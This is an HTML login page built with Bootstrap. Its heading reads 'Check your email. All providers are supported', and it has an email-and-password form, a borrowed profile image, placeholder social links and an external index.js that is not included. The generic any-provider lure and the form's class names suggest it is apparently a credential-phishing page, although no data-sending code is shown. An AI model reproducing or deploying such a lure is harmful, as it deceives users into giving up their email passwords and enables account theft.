
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Login</title>

    <!-- Bootstrap core CSS -->
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="style.4.css">
    <style type="text/css">
      .form-signin
      {
          max-width: 330px;
          padding: 15px;
          margin: 0 auto;
      }
      .form-signin .form-signin-heading, .form-signin .checkbox
      {
          margin-bottom: 10px;
      }
      .form-signin .checkbox
      {
          font-weight: normal;
      }
      .form-signin .form-control
      {
          position: relative;
          font-size: 16px;
          height: auto;
          padding: 10px;
          -webkit-box-sizing: border-box;
          -moz-box-sizing: border-box;
          box-sizing: border-box;
      }
      .form-signin .form-control:focus
      {
          z-index: 2;
      }
      .form-signin input[type="text"]
      {
          margin-bottom: -1px;
          border-bottom-left-radius: 0;
          border-bottom-right-radius: 0;
      }
      .form-signin input[type="password"]
      {
          margin-bottom: 10px;
          border-top-left-radius: 0;
          border-top-right-radius: 0;
      }
      .account-wall
      {
          margin-top: 20px;
          padding: 40px 0px 20px 0px;
          background-color: #f7f7f7;
          -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
          -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
          box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
      }
      .login-title
      {
          color: #555;
          font-size: 18px;
          font-weight: 400;
          display: block;
      }
      .profile-img
      {
          width: 96px;
          height: 96px;
          margin: 0 auto 10px;
          display: block;
          -moz-border-radius: 50%;
          -webkit-border-radius: 50%;
          border-radius: 50%;
      }
      .need-help
      {
          margin-top: 10px;
      }
      .new-account
      {
          display: block;
          margin-top: 10px;
      }    
    </style>
  </head>

  <body>
    <div>
      
    </div>
    <div class="container">

        <div class="row">
        
                
            <div class="col-sm-6 col-md-4 col-md-offset-4">
                <h1 class="text-center login-title">Check your email. All providers are supported </h1>
                <div class="account-wall">
                    <img class="profile-img" src="https://lh5.googleusercontent.com/-b0-k99FZlyE/AAAAAAAAAAI/AAAAAAAAAAA/eu7opA4byxI/photo.jpg?sz=120"
                        alt="">
                    <form class="form-signin">
                    <input type="text" class="form-control emailaddy" placeholder="Email" required autofocus>
                    <input type="password" class="form-control passwd" placeholder="Password" required>
                    <button class="btn btn-lg btn-primary btn-block nextbtn" type="submit">
                        Sign in</button>
                    <label class="checkbox pull-left">
                        <input type="checkbox" value="remember-me">
                        Remember me
                    </label>
                    <a href="#" class="pull-right need-help">Need help? </a><span class="clearfix"></span>
                    </form>
                </div>
            </div>
        </div>
        <div class="row btm-row">
            <div class="col-md-12">
                <a href="#" target="_blank" class="btn-social btn-behance"><i class="fa fa-behance"></i></a>
                <a href="#" target="_blank" class="btn-social btn-bitbucket"><i class="fa fa-bitbucket"></i></a>
                <a href="#" target="_blank" class="btn-social btn-codepen"><i class="fa fa-codepen"></i></a>
                <a href="#" target="_blank" class="btn-social btn-deviantart"><i class="fa fa-deviantart"></i></a>
                <a href="#" target="_blank" class="btn-social btn-digg"><i class="fa fa-digg"></i></a>
                <a href="#" target="_blank" class="btn-social btn-dribbble"><i class="fa fa-dribbble"></i></a>
                <a href="#" target="_blank" class="btn-social btn-dropbox"><i class="fa fa-dropbox"></i></a>
                <a href="#" target="_blank" class="btn-social btn-facebook"><i class="fa fa-facebook"></i></a>
                <a href="#" target="_blank" class="btn-social btn-flickr"><i class="fa fa-flickr"></i></a>
                <a href="#" target="_blank" class="btn-social btn-foursquare"><i class="fa fa-foursquare"></i></a>
                <a href="#" target="_blank" class="btn-social btn-github"><i class="fa fa-github-alt"></i></a>
                <a href="#" target="_blank" class="btn-social btn-google-plus"><i class="fa fa-google-plus"></i></a>
                <a href="#" target="_blank" class="btn-social btn-instagram"><i class="fa fa-instagram"></i></a>
                <a href="#" target="_blank" class="btn-social btn-jsfiddle"><i class="fa fa-jsfiddle"></i></a>
                <a href="#" target="_blank" class="btn-social btn-lastfm"><i class="fa fa-lastfm"></i></a>
                <a href="#" target="_blank" class="btn-social btn-linkedin"><i class="fa fa-linkedin"></i></a>
                <a href="#" target="_blank" class="btn-social btn-paypal"><i class="fa fa-paypal"></i></a>
            </div>
        </div>      
    </div> <!-- /container -->


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
    <script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>
    
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
    <script src="index.js"></script>
  </body>
</html>
